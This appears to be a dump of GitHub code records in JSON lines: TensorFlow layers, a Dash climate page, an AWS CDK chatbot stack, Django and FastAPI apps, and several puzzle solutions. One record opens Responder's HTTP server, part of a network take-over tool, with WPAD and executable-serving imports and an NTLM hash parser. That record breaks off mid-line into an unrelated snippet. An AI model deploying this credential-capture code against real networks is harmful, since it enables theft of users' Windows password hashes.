[k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.compat.v1.random_normal_initializer(stddev=stddev))\n \n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n # Support for verisons of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n biases = tf.compat.v1.get_variable('biases', [output_shape[-1]], initializer=tf.compat.v1.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n if with_w:\n return deconv, w, biases\n else:\n return deconv, w, biases\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool2d(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\n","repo_name":"HWQuantum/HistNet","sub_path":"Codes_network/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"23655727495","text":"import os\nimport dash\nfrom dash import dcc, html, Input, Output, ctx, callback\n\nfrom utils.TEMPERATURA import *\nfrom utils.documentacion.spanish import *\n\nresponsive = True\n\ndash.register_page(\n __name__,\n name='Temperatura',\n path='/Temperatura'\n)\n\n# Data temperatura\ntemperatura = TEMPERATURA()\ntemperatura.get_data()\n\n\n#--\nlayout = html.Div([\n\n dcc.Markdown(\"\"\"\n # El Niño-Oscilación del Sur (ENSO)\n\n El Niño-Oscilación del Sur, es un fenómeno natural caracterizado por la fluctuación de las temperaturas del océano en la parte central y oriental del Pacífico ecuatorial, asociada a cambios en la atmósfera. El ENSO debe su nombre a sus componentes oceánicas (El Niño y La Niña) y atmosférica (Oscilación del Sur) y es uno de los fenómenos climáticos de mayor influencia a nivel global. El mismo, está relacionado con las anomalías interanuales de las precipitaciones que pueden verse reflejadas en largas sequias o fuertes lluvias. Específicamente, en los países andinos el fenómeno de El Niño causa extensas inundaciones en las zonas costeras de Ecuador, del norte del Perú y el oriente de Bolivia. Al mismo tiempo, produce sequías en todo el altiplano boliviano-peruano y déficits de lluvias en Colombia y Venezuela.\n \"\"\"),\n html.Br(),\n html.Br(),\n dcc.Tabs(id=\"tabs-temp\", value='tab-sst', \n children=[dcc.Tab(label='SST', value='tab-sst'),\n dcc.Tab(label='Anomalías de SST', value='tab-anomalias'),\n dcc.Tab(label='ONI', value='tab-oni')\n ]),\n\n html.Div([html.Div(id='out-tab-temp')],className='out__tab__temp')\n])\n\n\n@callback(\n Output('out-tab-temp', 'children'),\n Input('tabs-temp', 'value')\n)\ndef displayClick(tabs_temp):\n\n height=600\n width=900\n\n\n if tabs_temp == 'tab-sst':\n\n graph = temperatura.temperatura_sst(serie='nino34_mean', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_sst),\n dcc.Graph(id=\"graph_sst\", figure=graph,responsive=responsive,className='graph__sst'),\n html.Br(),\n html.Br()\n ]\n\n elif tabs_temp == 'tab-anomalias':\n\n graph = temperatura.temperatura_sst(serie='anomalias', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_anomalias),\n html.Div([\n dcc.Graph(id=\"graph_anomalias\",\n figure=graph,\n responsive=True)\n ],\n className='graph__anomalias'),\n html.Br(),\n html.Br()\n ]\n\n elif tabs_temp == 'tab-oni':\n graph = temperatura.temperatura_oni(height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(text_temperatura_oni),\n dcc.Graph(id=\"graph_oni\", figure=graph,responsive=responsive,className='graph__oni'),\n html.Br(),\n html.Br()\n ]\n \n else:\n graph = temperatura.temperatura_sst(serie='nino34_mean', height=height, width=width)\n return [\n html.Br(),\n dcc.Markdown(\"\"\"ERROR\"\"\"),\n html.Br(),\n dcc.Graph(id=\"example-graph\", figure=graph,responsive=responsive),\n html.Br(),\n dcc.Markdown(\"\"\"ERROR\"\"\")\n ]\n","repo_name":"esglobe/seev-dash","sub_path":"app_ssev/pages/temperatura.py","file_name":"temperatura.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14151919834","text":"# compute_stack.py\nfrom aws_cdk import Stack, aws_lambda, aws_iam, aws_secretsmanager, aws_dynamodb, CfnOutput\n\n\nfrom constructs import Construct\n\nclass AwsServerlessChatbotBackendStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n \n\n # IAM role for Lambda functions\n lambda_role = aws_iam.Role(\n self, \"LambdaExecutionRole\",\n assumed_by=aws_iam.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"AmazonDynamoDBFullAccess\")\n ]\n )\n\n # Add inline policy to the lambda_role for accessing the secret\n secret_arn = \"arn:aws:secretsmanager:us-east-2:868658902285:secret:prod/chatbot/secrectname-xPgLfu\" # Replace with your actual secret ARN\n lambda_role.add_to_policy(aws_iam.PolicyStatement(\n actions=[\"secretsmanager:GetSecretValue\"],\n resources=[secret_arn]\n ))\n\n # DynamoDB Table with On-Demand capacity\n context_table = aws_dynamodb.Table(\n self, \"chBotContextTable\",\n partition_key=aws_dynamodb.Attribute(name=\"user_id\", type=aws_dynamodb.AttributeType.STRING),\n billing_mode=aws_dynamodb.BillingMode.PAY_PER_REQUEST\n )\n\n\n # Layer for Lambda\n lambda_layer = aws_lambda.LayerVersion(\n self, \"MyChBotLayer\",\n code=aws_lambda.Code.from_asset(\"lib_layer\"),\n compatible_runtimes=[aws_lambda.Runtime.PYTHON_3_11],\n description=\"A layer for shared libraries\"\n )\n\n\n # Lambda function\n lambda_function_1 = aws_lambda.Function(\n self, \"chBotBackEndLambda\",\n runtime=aws_lambda.Runtime.PYTHON_3_11,\n handler=\"index.handler\",\n code=aws_lambda.Code.from_asset(\"lambda_backend\"),\n environment={\n \"TABLE_NAME\": context_table.table_name\n },\n role=lambda_role,\n layers=[lambda_layer]\n )\n\n # Grant Lambda function access to the DynamoDB table\n context_table.grant_full_access(lambda_function_1)\n\n # Outputs\n CfnOutput(self, \"LambdaFunctionName\", value=lambda_function_1.function_name)\n CfnOutput(self, \"DynamoDBTableName\", value=context_table.table_name)\n","repo_name":"amitraikkr/aws-serverless-chatbot-backend","sub_path":"aws_serverless_chatbot_backend/aws_serverless_chatbot_backend_stack.py","file_name":"aws_serverless_chatbot_backend_stack.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393032232","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\ndice = [list(map(int, input().split())) for _ in range(n)]\nidx = [5,3,4,1,2,0]\n\ndef find(i):\n ret = 0\n if i == 6:\n return 0\n if i == 0 or i == 5:\n ret += max(dice[0][1:5])\n elif i == 1 or i == 3:\n ret += max(dice[0][0], dice[0][2], dice[0][4], dice[0][5])\n elif i == 2 or i == 4:\n ret += max(dice[0][0], dice[0][1], dice[0][3], dice[0][5])\n prev = dice[0][idx[i]]\n for j in range(n-1):\n j_idx = dice[j + 1].index(prev)\n if j_idx == 0 or j_idx == 5:\n ret += max(dice[j+1][1:5])\n elif j_idx == 1 or j_idx == 3:\n ret += max(dice[j+1][0], dice[j+1][2], dice[j+1][4], dice[j+1][5])\n elif j_idx == 2 or j_idx == 4:\n ret += max(dice[j+1][0], dice[j+1][1], dice[j+1][3], dice[j+1][5])\n prev = dice[j+1][idx[j_idx]]\n\n ret = max(ret, find(i+1))\n return ret\n\nprint(find(0))","repo_name":"112224/algorithm","sub_path":"python3/2116 주사위 쌓기.py","file_name":"2116 주사위 쌓기.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12536367621","text":"from datetime import datetime\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytest\nfrom rdp import rdp\n\nfrom brevet_top_plot_a_route import (\n ROUTE_SIMPLIFY_FACTOR,\n)\nfrom brevet_top_strava import (\n cut_off_prolog,\n cut_off_epilog,\n np_align_track_to_route,\n TRACK_SIMPLIFY_FACTOR,\n)\n\n\n@pytest.mark.parametrize(\n (\"track_name\", \"expected\", \"length\"),\n [\n (\"jogging.gpx\", -211.33, (39, 7, 7)),\n (\"jogging-2.gpx\", -722.519, (220, 7, 7)),\n (\"jogging-3.gpx\", -624.105, (307, 7, 7)),\n (\"jogging-5.gpx\", -497.027, (265, 7, 7)),\n ],\n)\ndef x_test_gpx_route(\n track_name: str,\n expected: float,\n length: Tuple[int, int, int],\n gpx_route: List[Tuple[float, float, float, float]],\n gpx_track: List[Tuple[float, float, float, float]],\n gpx_waypoints: List[Tuple[float, float, int]],\n):\n route = np.array(gpx_route)\n route_mask = rdp(route[:, :2], ROUTE_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n draft = np.array(gpx_track)\n track = cut_off_prolog(cut_off_epilog(draft, route[-1]), route[0])\n track_mask = rdp(track[:, :3], TRACK_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n\n cost, reduced = np_align_track_to_route(route[route_mask], track[track_mask])\n\n plt.plot(route[route_mask].T[1], route[route_mask].T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\"o\")\n plt.plot(track[track_mask].T[1], track[track_mask].T[0], marker=\"+\")\n plt.plot(track.T[1], track.T[0], marker=\".\")\n # plt.show()\n\n assert round(cost, 3) == expected\n assert (len(track), len(route[route_mask]), len(reduced)) == length\n\n\n@pytest.mark.parametrize(\n (\"track_name\", \"expected\", \"length\"),\n [\n (\"jogging.gpx\", -870.924, (39, 6, 6)),\n (\"jogging-2.gpx\", -867.415, (598, 6, 6)),\n (\"jogging-3.gpx\", -484.468, (684, 6, 6)),\n (\"jogging-5.gpx\", -1157.605, (651, 6, 6)),\n ],\n)\ndef x_test_gpx_checkpoints(\n track_name: str,\n expected: float,\n length: Tuple[int, int, int],\n gpx_route: List[Tuple[float, float, float, float]],\n gpx_track: List[Tuple[float, float, float, float]],\n gpx_waypoints: List[Tuple[float, float, int]],\n get_checkpoints: List[Tuple[float, float, float, float]],\n):\n checkpoints = np.array(get_checkpoints)\n\n draft = np.array(gpx_track)\n track = cut_off_prolog(\n cut_off_epilog(draft, get_checkpoints[-1]), get_checkpoints[0]\n )\n track_mask = rdp(track[:, :3], TRACK_SIMPLIFY_FACTOR, algo=\"iter\", return_mask=True)\n\n cost, reduced = np_align_track_to_route(checkpoints, track[track_mask])\n\n plt.plot(checkpoints.T[1], checkpoints.T[0], marker=\"x\")\n plt.plot(reduced.T[1], reduced.T[0], marker=\"o\")\n plt.plot(track.T[1], track.T[0], marker=\".\")\n # plt.show()\n # assert False\n\n for i, cp in enumerate(reduced):\n # test for NaN\n if cp[3] == cp[3]:\n print(f\"control {i}. {cp[0:2]} {cp[3]} {datetime.fromtimestamp(cp[2])}\")\n\n assert round(cost, 3) == expected\n assert (len(draft), len(checkpoints), len(reduced)) == length\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_strava/tests/test_np_gpx_jogging.py","file_name":"test_np_gpx_jogging.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23286481777","text":"\"\"\"virtualmagiciansapi URL Configuration\"\"\"\nfrom django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom virtualmagicians.views import register_user, login_user, Customers, Products, Users, PaymentTypes, ProductTypes, Orders, OrderProducts\n\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r'customers', Customers, 'customer')\nrouter.register(r'products', Products, 'product')\nrouter.register(r'users', Users, 'user')\nrouter.register(r'orders', Orders, 'order')\nrouter.register(r'order_products', OrderProducts, 'orderproduct')\nrouter.register(r'payment_types', PaymentTypes, 'payment_type')\nrouter.register(r'product_types', ProductTypes, 'product_type')\n\nurlpatterns = [\n path('', include(router.urls)),\n path('register/', register_user),\n path('login/', login_user),\n path('api-token-auth/', obtain_auth_token),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n]","repo_name":"nss-cohort-36/bangazon-api-virtual_magicians","sub_path":"virtualmagiciansapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17654108758","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport string\nimport sys\n\ndef words_pythonest(text,n):\n words=[]\n c=\"\"\n j=0\n while text[j].isspace():\n j+=1\n for i in range(j,len(text)):\n if text[i].isalpha():\n c+=text[i]\n if i==len(text)-1:\n words.append(c)\n else:\n if (text[i].isspace() and text[i-1].isalpha()) or (text[i] in string.punctuation):\n words.append(c)\n c=\"\"\n words_sorted=[]\n for i in words:\n if len(i)>n:\n words_sorted.append(i)\n return words_sorted\n \nif __name__=='__main__':\n if len(sys.argv)>3:\n print(\"Too many arguments\")\n elif len(sys.argv)<3:\n print(\"Few arguments\")\n else:\n if sys.argv[1].isdigit():\n print(\"ERROR\")\n else:\n if sys.argv[2].isdigit():\n print(words_pythonest(sys.argv[1],int(sys.argv[2])))\n else:\n print(\"ERROR\")","repo_name":"AyoubDaoudia/bootcamp_python_codes","sub_path":"day00/ex07/filterwords.py","file_name":"filterwords.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16646095820","text":"# 23/03/27\n# https://leetcode.cn/problems/next-greater-element-ii/\n\nfrom collections import List \n\ndef nextGreaterElements(nums: List[int]) -> List[int]:\n\n lengthOfNums = len(nums)\n stack = list()\n result = [-1 for _ in range(lengthOfNums)]\n\n for i in range(lengthOfNums * 2):\n index = i % lengthOfNums\n while stack and nums[index] > nums[stack[-1]]:\n result[stack[-1]] = nums[index]\n stack.pop()\n stack.append(index)\n \n return result","repo_name":"Syueying/LeetCodeDaily","sub_path":"单调栈/3. 下一个更大元素 II - 503/Next Greater Element II.py","file_name":"Next Greater Element II.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13708505440","text":"#!/usr/bin/env python\n# This file is part of Responder, a network take-over set of tools \n# created and maintained by Laurent Gaffie.\n# email: laurent.gaffie@gmail.com\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\nimport struct\nimport codecs\nfrom responder.utils import *\n\nif settings.Config.PY2OR3 == \"PY3\":\n from socketserver import BaseRequestHandler, StreamRequestHandler\nelse:\n from SocketServer import BaseRequestHandler, StreamRequestHandler\nfrom base64 import b64decode, b64encode\nfrom responder.packets import NTLM_Challenge\nfrom responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans, \\\n WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans\nfrom responder.packets import WPADScript, ServeExeFile, ServeHtmlFile\n\n\n# Parse NTLMv1/v2 hash.\ndef ParseHTTPHash(data, Challenge, client, module, tool_q=None):\n LMhashLen = struct.unpack(' 24:\n NthashLen = 64\n DomainLen = struct.unpack(' List[str]:\n ans = []\n dic = {2:[\"a\",\"b\",\"c\"], 3:[\"d\",\"e\",\"f\"], 4:[\"g\",\"h\",\"i\"],\n 5:[\"j\",\"k\",\"l\"],6:[\"m\",\"n\",\"o\"],7:[\"p\",\"q\",\"r\",\"s\"],\n 8:[\"t\",\"u\",\"v\"],9:[\"w\",\"x\",\"y\",\"z\"]}\n for i in range(len(digits)):\n if ans:\n ans = self.multi(ans,dic[int(digits[i])] )\n else:\n ans = dic[int(digits[i])]\n return ans\n \n \n\n def multi(self, l1 , l2):\n ans = []\n for i in range(len(l1)):\n for j in range(len(l2)):\n ans.append((l1[i]+l2[j]))\n return ans\n","repo_name":"mhrezaiek/Algorithm-Problems","sub_path":"letterCombinations.py","file_name":"letterCombinations.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25671503030","text":"import os\nimport flask\n\nfrom src import factory_build_app\nfrom src.service.DatacubeIndexesService import DatacubeIndexesService\n\napp = factory_build_app(os.getenv('BOILERPLATE_ENV') or 'dev')\n\nHTTP_HOST = os.getenv('HTTP_HOST', '127.0.0.1')\nHTTP_PORT = int(os.getenv('HTTP_PORT', '5001'))\n\n\n@app.route('/', methods=['POST'])\ndef pull_economic_indexes_local():\n return pull_economic_indexes(flask.request)\n\n\ndef pull_economic_indexes(request):\n \"\"\"\n Pull SpaceKnow economic products from the Product API.\n\n expected request format:\n {\n authentiactionToken: \"\",\n products: [productId]\n }\n\n :return: Dict with success status.\n \"\"\"\n datacube_index_service = DatacubeIndexesService(request.json.get('authenticationToken'))\n index_catalog = datacube_index_service.get_indexes_by_product_id()\n\n if index_catalog == {} or 'error' in index_catalog:\n status = 'failed'\n else:\n status = 'success'\n\n return {\n 'status': status,\n 'results': index_catalog\n }\n\n\ndef handle_http_event(request):\n \"\"\"Responds to any HTTP request.\n Args:\n request (flask.Request): HTTP request object.\n Returns:\n The response text or any set of values that can be turned into a\n Response object using\n `make_response `.\n \"\"\"\n return pull_economic_indexes(request)\n\n\nif __name__ == '__main__':\n app.run(host=HTTP_HOST, port=HTTP_PORT)\n","repo_name":"drabekj/datacube-indexes-microservice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18238247731","text":"\"\"\"\nLicense Plate Models.\n\"\"\"\n\nfrom datetime import datetime\nfrom db import db\n\n\nclass LicensePlateModel(db.Model):\n \"\"\"\n Models definition.\n \"\"\"\n\n __tablename__ = 'license_plate'\n\n id = db.Column(\n db.Integer,\n primary_key=True,\n )\n plate = db.Column(\n db.String(10),\n nullable=False,\n unique=True,\n )\n timestamp = db.Column(\n db.String(20),\n nullable=True,\n )\n\n def __init__(self, plate) -> None:\n self.plate = plate\n self.timestamp = datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n def __repr__(self) -> str:\n return f'LicensePlateModel(plate={self.plate},\\\n timestamp{self.timestamp})'\n\n def json(self, ):\n return{\n 'plate': self.plate,\n 'timestamp': self.timestamp,\n }\n\n @classmethod\n def find_all(cls: object) -> object:\n \"\"\"\n Query to retrieve all data from database.\n\n :return: All data as class objects.\n \"\"\"\n\n return cls.query.all()\n\n def save_to_db(self, ):\n \"\"\"\n Data base commit.\n \"\"\"\n\n db.session.add(self)\n db.session.commit()\n","repo_name":"LucasAlbFar/license_plate_repo","sub_path":"src/models/license_plate.py","file_name":"license_plate.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35587703822","text":"import random\nimport time\n\n\ndef random_int_list(start, stop, length):\n start, stop = (int(start), int(stop)) if start <= stop else (\n int(stop), int(start))\n length = int(abs(length)) if length else 0\n random_list = []\n for i in range(length):\n random_list.append(random.randint(start, stop))\n return random_list\n\n\ndef INSERTION_SORT(list, p, r):\n for n in range(p + 1, r):\n tmp = list[n]\n i = n - 1\n while i >= p and list[i] > tmp:\n list[i + 1] = list[i]\n i = i - 1\n list[i + 1] = tmp\n\n\ndef MERGE(list, p, q, r, k):\n L = list[p:q]\n R = list[q:r]\n i = j = 0\n while i < len(L) and j < len(R):\n if L[i] <= R[j]:\n list[p] = L[i]\n i += 1\n else:\n list[p] = R[j]\n j += 1\n p += 1\n if i > j:\n for j in range(j, len(R)):\n list[p] = R[j]\n p += 1\n else:\n for i in range(i, len(L)):\n list[p] = L[i]\n p += 1\n\n\ndef MERGE_SORT(list, p, r, k):\n if len(list[p:r]) < k:\n INSERTION_SORT(list, p, r)\n elif p < r - 1:\n q = int((r - p) / 2 + p)\n MERGE_SORT(list, p, q, k)\n MERGE_SORT(list, q, r, k)\n MERGE(list, p, q, r, k)\n\n\nA = random_int_list(1, 10000, 1000)\n\nstart = time.clock()\nMERGE_SORT(A, 0, len(A), 20)\nend = time.clock()\nprint(\"K=20 : %f s\" % (end - start))\n\nB = [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]\nstart = time.clock()\nMERGE_SORT(A, 0, len(A), 0)\nend = time.clock()\nprint(\"K= 0 : %f s\" % (end - start))\n","repo_name":"mixterjim/Learn","sub_path":"Python/CLRS/2-1_Merge-Insertion-Sort.py","file_name":"2-1_Merge-Insertion-Sort.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21302819285","text":"\"\"\"Punto de entrada\"\"\"\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom app.api.api import api_router\n\napp = FastAPI(\n title=\"LaFedeAPI\",\n summary='LA FEDE API: obtén información sobre 2ª Autonómica Masculina.',\n description=\"\"\"\n ## EndPoints\n\n * Resultados de temporadas anteriores\n * Información sobre los equipos por temporada\n * **Calendarios de temporadas anteriores** (_not implemented_).\n \"\"\",\n version=\"0.0.1\",\n contact={\n \"name\": \"Valentín Lorente Jiménez\",\n \"url\": \"https://github.com/vLorente\",\n \"email\": \"vlorentejimenez@gmail.com\",\n },\n)\n\n# Configuración de CORS\norigins = [\n \"http://localhost\",\n \"http://localhost:8000\",\n]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(api_router)\n","repo_name":"vLorente/la-fede-teams-analytics","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19049599971","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom typing import Tuple\n\nfrom fastapi import Depends, HTTPException, status\n\nfrom models.user import User\nfrom utils.auth import get_current_active_user\nfrom utils.cache import BaseCache, CacheMixin\n\n\nclass MeteringCache(BaseCache, CacheMixin):\n CACHE_NAME = \"metering\"\n\n def _generate_usage_key_per_second(self, api_key: str) -> str:\n return self._generate_key(api_key, datetime.utcnow().strftime(\"%Y%m%d-%H%M%S\"))\n\n def _generate_usage_key_per_minute(self, api_key: str) -> str:\n return self._generate_key(api_key, datetime.utcnow().strftime(\"%Y%m%d-%H%M\"))\n\n def increment_api_usage(self, api_key: str) -> dict:\n usage_per_second = self._incr_value(self._generate_usage_key_per_second(api_key))\n usage_per_minute = self._incr_value(self._generate_usage_key_per_minute(api_key))\n return {\n \"per_second\": usage_per_second,\n \"per_minute\": usage_per_minute,\n }\n\n def get_api_usage(self, api_key: str) -> dict:\n usage_per_second = int(self._get_value(self._generate_usage_key_per_second(api_key)) or 0)\n usage_per_minute = int(self._get_value(self._generate_usage_key_per_minute(api_key)) or 0)\n return {\n \"per_second\": usage_per_second,\n \"per_minute\": usage_per_minute,\n }\n\n\ndef get_api_usage(\n current_user_with_token: Tuple[User, str, str] = Depends(get_current_active_user)\n) -> Tuple[User, str, dict]:\n from settings.active import ( # pylint:disable=import-outside-toplevel\n RATE_THROTTLING_PER_MINUTE,\n RATE_THROTTLING_PER_SECOND,\n )\n\n current_user, token, _type = current_user_with_token\n usage = MeteringCache().get_api_usage(token)\n if usage[\"per_second\"] >= RATE_THROTTLING_PER_SECOND:\n raise HTTPException(status_code=status.HTTP_429_TOO_MANY_REQUESTS, detail=\"Throttling per second\")\n if usage[\"per_minute\"] >= RATE_THROTTLING_PER_MINUTE:\n raise HTTPException(status_code=status.HTTP_429_TOO_MANY_REQUESTS, detail=\"Throttling per minute\")\n return current_user, _type, MeteringCache().increment_api_usage(token)\n","repo_name":"cristhianclx/logs","sub_path":"app/utils/metering.py","file_name":"metering.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245888377","text":"\"\"\"Dia meter of a binary tree.\"\"\"\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.left = None\n self.right = None\n\n def find_max(self, node, maxi: list[int]) -> int:\n if node is None:\n return 0\n\n lh: int = self.find_max(node.left, maxi)\n rh: int = self.find_max(node.right, maxi)\n\n maxi[0] = max(maxi[0], lh + rh)\n\n return 1 + max(lh, rh)\n\n def diameter_of_bt(self, maxi: list[int]) -> int:\n self.find_max(self, maxi)\n return maxi[0]\n\n\ndef build_tree():\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n\n root.left.left = Node(4)\n root.left.right = Node(5)\n\n root.left.right.left = Node(6)\n root.left.right.right = Node(7)\n\n return root\n\n\nif __name__ == \"__main__\":\n root = build_tree()\n # print(root.max_height(root))\n maxi: list[int] = [0]\n print(root.diameter_of_bt(maxi))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/tree/dia_meter_of_bt.py","file_name":"dia_meter_of_bt.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16644347315","text":"from django.db import models\n\n\nCOMPLETED = 'C'\nABANDONED = 'A'\nONGOING = 'O'\nDELETED = 'D'\nSTATUS_CHOICES = (\n (COMPLETED, 'Completed'),\n (ABANDONED, 'Abandoned'),\n (ONGOING, 'Ongoing'),\n (DELETED, 'Deleted'),\n )\n\n\nclass Project(models.Model):\n name = models.CharField(max_length=200)\n objective = models.TextField()\n notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass ExperimentManager(models.Manager):\n def create_experiment(self,name,objective,notes,project_id):\n experiment = self.create(name=name, objective=objective, notes=notes, project_id=project_id)\n experiment.order = experiment.pk\n experiment.save()\n return experiment\n\n\nclass Experiment(models.Model):\n name = models.CharField(max_length=200)\n objective = models.TextField()\n notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n project = models.ForeignKey(Project)\n order = models.PositiveIntegerField(unique=True,blank=True,default=0) # default value is replaced on creation\n\n objects = ExperimentManager()\n\n def update_order(self, new_order):\n old_order = self.order\n self.order = 0\n self.save() # to preserve uniqueness of order field\n\n up = new_order > old_order # whether you're going up or down in order\n next_order = old_order\n list_of_updated_experiments = []\n\n while next_order != new_order:\n next_order = next_order + 1 if up else next_order - 1\n next_experiment = type(self).objects.get(order=next_order)\n next_experiment.order = next_order - 1 if up else next_order + 1\n next_experiment.save()\n list_of_updated_experiments.append(next_experiment)\n self.order = new_order\n self.save()\n list_of_updated_experiments.append(self)\n return list_of_updated_experiments\n \n def __unicode__(self):\n return self.name\n\n\nclass Task(models.Model):\n name = models.CharField(max_length=200)\n # objective = models.TextField()\n notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n date = models.DateField()\n experiment = models.ForeignKey(Experiment)\n\n def __unicode__(self):\n return self.name\n","repo_name":"MikesAtMIT/planner","sub_path":"plans/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33341056361","text":"import sys, threading, heapq, math\nfrom collections import defaultdict, Counter\ninput = sys.stdin.readline\n\n\ndef main():\n for _ in range(int(input())):\n n = int(input())\n look = input().strip()\n sums = []\n for i in range(n):\n if look[i] == \"L\":\n sums.append(i)\n else:\n sums.append(n-i-1)\n final = []\n for i in range(n):\n final.append(max(i,n-i-1))\n res = []\n left, right = 0, n-1\n total = sum(sums)\n for i in range(n//2):\n if final[i] != sums[i]:\n total += final[i] - sums[i]\n res.append(total)\n if final[n-i-1] != sums[n-i-1]:\n total += final[n-i-1] - sums[n-i-1]\n res.append(total)\n while len(res) < n:\n res.append(total)\n print(*res)\n \nmain()\n \n# threading.stack_size(1 << 27)\n# sys.setrecursionlimit(1 << 30)\n# main_thread = threading.Thread(target=main)\n# main_thread.start()\n# main_thread.join()\n ","repo_name":"natitedros/Competitive-Programming","sub_path":"campContest/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9404812282","text":"#!/usr/bin/python3\n'''\njeopardy game\n'''\n\n# import a lib to make an http request\nimport requests\n\ndef main():\n # prompt for initials\n player = input(\"Type in your initals: \")\n rounds = input(\"How many rounds would you like to play? \")\n playerscore = 0 # counter for the player score\n\n # make a req to http://jservice.io/api/random\n zresp = requests.get(f\"http://jservice.io/api/random?count={rounds}\")\n\n # strip off json from 200 